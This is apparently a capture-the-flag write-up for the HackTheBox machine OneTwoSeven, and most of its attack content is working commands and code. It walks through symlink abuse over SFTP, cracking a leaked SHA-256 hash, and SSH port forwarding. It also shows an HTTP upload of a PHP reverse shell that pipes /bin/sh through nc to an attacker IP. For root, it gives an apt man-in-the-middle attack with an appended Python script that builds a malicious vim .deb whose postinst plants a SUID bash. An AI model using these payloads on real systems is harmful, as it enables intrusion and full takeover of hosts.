OneTwoSeven

nmap -sC -sV -oA nmap/onetwoseven.htb 10.10.10.133

# Nmap 7.70 scan initiated Wed Apr 24 15:36:04 2019 as: nmap -Pn -sC -sV -oA nmap/onetwoseven 10.10.10.133
Nmap scan report for 10.10.10.133
Host is up (0.16s latency).
Not shown: 998 closed ports
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.4p1 Debian 10+deb9u6 (protocol 2.0)
| ssh-hostkey:
|   2048 48:6c:93:34:16:58:05:eb:9a:e5:5b:96:b6:d5:14:aa (RSA)
|   256 32:b7:f3:e2:6d:ac:94:3e:6f:11:d8:05:b9:69:58:45 (ECDSA)
|_  256 35:52:04:dc:32:69:1a:b7:52:76:06:e3:6c:17:1e:ad (ED25519)
80/tcp open  http    Apache httpd 2.4.25 ((Debian))
|_http-server-header: Apache/2.4.25 (Debian)
|_http-title: Page moved.
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Wed Apr 24 15:37:22 2019 -- 1 IP address (1 host up) scanned in 77.43 seconds

SFTP

While enumerating port 80 we found a set of SFTP login credentials:

Username: ots-kMjNlZjE
Password: a6d23ef1

Log in with:

sftp ots-kMjNlZjE@10.10.10.133

After some web searching and experimenting we find that the SFTP account can create symlinks, and Apache (which runs with more privileges than the SFTP user) will follow them when they are requested under http://10.10.10.133/ots-kMjNlZjE/ . So, from the sftp prompt, create a symlink to the root directory named root (the sftp command is symlink oldpath newpath):

symlink / root

Then open it in the browser at http://10.10.10.133/ots-kMjNlZjE/root .

Web Exploitation

Obtaining hash

Browsing http://10.10.10.133/ots-kMjNlZjE/root we find a file login.php.swp. It is a Vim swap file (left behind while login.php was being edited); viewing it gives us a hash for the user ots-admin:

ots-admin
11c5a42c9d74d5442ef3cc835bda1b3e7cc7f494e704a10d0de426b2fbe5cbd8 

Cracking hash

The hash is 64 hex characters, so it is raw SHA-256. Crack it with john (pass.hash is a file containing only the hash; john auto-detects the type, or pass --format=Raw-SHA256 to pin it):

john --wordlist=rockyou.txt pass.hash

which gives the password Homesweethome1.

SSH tunneling

Exploring the source code further, we find an admin login served on localhost:60080 of the remote machine. Use SSH local port forwarding to map our localhost:60080 to the remote machine's localhost:60080:

ssh -N -L 60080:127.0.0.1:60080 ots-kMjNlZjE@10.10.10.133

~ we can do this because SFTP runs over SSH, so the same credentials open an SSH session; -N asks for no remote command, only the forward.

Shell Upload

Logging in as ots-admin gives us menu.php, which lists several PHP addons. After some enumeration and reading ots-addon-man, we upload a reverse shell with the following request (note the path, /addon-download.php/addon-upload.php, rather than /addon-upload.php directly). ~ I used Python to build this request.

POST /addon-download.php/addon-upload.php HTTP/1.1
Host: 127.0.0.1:60080
User-Agent: Mozilla/5.0 Gecko/20100101 Firefox/65.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=---------------------------1805684181392670424798019532
Content-Length: 540
DNT: 1
Connection: close
Cookie: PHPSESSID=95bpafranr5ugmd7sh8b2895p5
Upgrade-Insecure-Requests: 1

-----------------------------1805684181392670424798019532
Content-Disposition: form-data; name="addon"; filename="ots-nice.php"
Content-Type: application/x-php

<?php session_start(); if (!isset ($_SESSION['username'])) { header("Location: /login.php"); }; if ( strpos($_SERVER['REQUEST_URI'], '/addons/') !== false ) { die(); };
# OneTwoSeven Admin Plugin
# OTS SHELL
echo shell_exec("rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.15.39 4444 >/tmp/f");
?>

-----------------------------1805684181392670424798019532--

Privilege Escalation

~ I used LinEnum.sh as the enumeration script.

sudo -l shows that we can run apt-get update && apt-get upgrade as root and that sudo lets us set the http_proxy environment variable, so apt is our attack vector. Searching the internet turns up an apt man-in-the-middle (MITM) attack, so we did the following steps.

  1. Follow the blog post to make the malicious .deb file and the Packages file.
     Those are the only parts we need; the rest of the post can be ignored.
  2. Create the repo structure:
.:
devuan

./devuan:
dists  pool

./devuan/dists:
ascii

./devuan/dists/ascii:
main

./devuan/dists/ascii/main:
binary-amd64

./devuan/dists/ascii/main/binary-amd64:
Packages

./devuan/pool:
main

./devuan/pool/main:
v

./devuan/pool/main/v:
vim

./devuan/pool/main/v/vim:
vim_11.1.0875-3_amd64.deb
  3. Make the box proxy through us: on the target, in the same shell we will run sudo from, set
export http_proxy=http://10.10.15.69:3128/
  4. Proxy to a proxy: run squid on our machine with an ACL that only allows requests whose destination resolves to 127.0.0.1 (squid.conf), then start it
acl GOOD dst 127.0.0.1
http_access allow GOOD
http_access deny all
sudo service squid start
  5. Set up the server: map packages.onetwoseven.htb to ourselves in /etc/hosts on our machine, so squid forwards apt's requests to a local web server, then serve the repo from the directory that contains devuan/
127.0.0.1 packages.onetwoseven.htb
sudo python -m SimpleHTTPServer 80

Getting a root shell

Now all that is left is to run the allowed apt-get update and apt-get upgrade through sudo on the box: update fetches our Packages index through the proxy, and upgrade installs our malicious vim package, giving a root shell.
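Steps 1 and 2 above (the malicious .deb and the Packages index inside the devuan/ tree), as an added example in Python using only the standard library, so it needs neither dpkg-deb nor dpkg-scanpackages. It is not the writeup's or the blog post's code. Only the package name, the file name and the directory layout come from the page; the control fields, the epoch 2 in the version (Debian's vim packages carry it, and the new version must sort above the installed one), and the postinst payload (a SUID copy of bash in /tmp) are assumptions, as is that the box accepts this unsigned index.

```python
"""Added example: build the malicious repo tree from the writeup with the stdlib only."""
import hashlib
import io
import os
import tarfile

DEB_NAME = "vim_11.1.0875-3_amd64.deb"               # file name from the page's tree
POOL_DIR = "devuan/pool/main/v/vim"                   # pool path from the page's tree
INDEX_DIR = "devuan/dists/ascii/main/binary-amd64"    # Packages location from the page's tree

# Assumed payload: dpkg runs postinst as root during `apt-get upgrade`.
POSTINST = "#!/bin/sh\ncp /bin/bash /tmp/rootbash && chmod 4755 /tmp/rootbash\nexit 0\n"

# Assumed control fields. The version must sort above the installed vim; Debian's vim
# carries epoch 2, so a version without the epoch would lose the comparison.
CONTROL_FIELDS = (
    "Package: vim\n"
    "Version: 2:11.1.0875-3\n"
    "Architecture: amd64\n"
    "Maintainer: nobody <nobody@example.invalid>\n"
)
DESCRIPTION = "Description: vim upgrade (example payload)\n"


def tar_gz(entries):
    """entries: (name, data_or_None, mode); None makes a directory. Returns .tar.gz bytes."""
    buf = io.BytesIO()
    with tarfile.open(fileobj=buf, mode="w:gz") as tf:
        for name, data, mode in entries:
            ti = tarfile.TarInfo(name)
            ti.mode = mode
            if data is None:
                ti.type = tarfile.DIRTYPE
                tf.addfile(ti)
            else:
                ti.size = len(data)
                tf.addfile(ti, io.BytesIO(data))
    return buf.getvalue()


def ar_member(name, data):
    """One member of a common-format ar archive: 60-byte header, data, pad to even length."""
    header = f"{name:<16}{0:<12}{0:<6}{0:<6}{'100644':<8}{len(data):<10}`\n".encode()
    assert len(header) == 60
    return header + data + (b"\n" if len(data) % 2 else b"")


def build_deb():
    """A .deb is an ar archive holding debian-binary, control.tar.gz, data.tar.gz in order."""
    control = tar_gz([
        ("./", None, 0o755),
        ("./control", (CONTROL_FIELDS + DESCRIPTION).encode(), 0o644),
        ("./postinst", POSTINST.encode(), 0o755),   # must be executable or dpkg rejects it
    ])
    data = tar_gz([("./", None, 0o755)])            # ships no files; postinst does the work
    return (b"!<arch>\n" + ar_member("debian-binary", b"2.0\n")
            + ar_member("control.tar.gz", control) + ar_member("data.tar.gz", data))


def packages_entry(deb):
    """Stanza for the Packages index; apt verifies Size and the hashes against the download."""
    return (CONTROL_FIELDS
            + f"Filename: pool/main/v/vim/{DEB_NAME}\n"   # relative to the devuan/ repo root
            + f"Size: {len(deb)}\n"
            + f"MD5sum: {hashlib.md5(deb).hexdigest()}\n"
            + f"SHA256: {hashlib.sha256(deb).hexdigest()}\n"
            + DESCRIPTION + "\n")


def ar_members(blob):
    """Parse an ar archive back into {name: bytes}, to check what we built."""
    assert blob[:8] == b"!<arch>\n"
    pos, members = 8, {}
    while pos < len(blob):
        name = blob[pos:pos + 16].decode().strip()
        size = int(blob[pos + 48:pos + 58].decode().strip())
        members[name] = blob[pos + 60:pos + 60 + size]
        pos += 60 + size + (size % 2)
    return members


def control_files(blob):
    """Files inside control.tar.gz (keys without the leading ./), i.e. what dpkg will run."""
    tgz = ar_members(blob)["control.tar.gz"]
    with tarfile.open(fileobj=io.BytesIO(tgz), mode="r:gz") as tf:
        return {m.name.lstrip("./"): tf.extractfile(m).read()
                for m in tf.getmembers() if m.isfile()}


def write_repo(root="."):
    """Write the .deb and Packages into the tree from the writeup, under root."""
    deb = build_deb()
    os.makedirs(os.path.join(root, POOL_DIR), exist_ok=True)
    os.makedirs(os.path.join(root, INDEX_DIR), exist_ok=True)
    with open(os.path.join(root, POOL_DIR, DEB_NAME), "wb") as f:
        f.write(deb)
    with open(os.path.join(root, INDEX_DIR, "Packages"), "w") as f:
        f.write(packages_entry(deb))
    return deb


if __name__ == "__main__":
    write_repo()
```

Run it in an empty directory and serve that directory with SimpleHTTPServer as in step 5. After the upgrade on the box, /tmp/rootbash -p gives the root shell under the assumed payload; swap POSTINST for whatever shell you prefer.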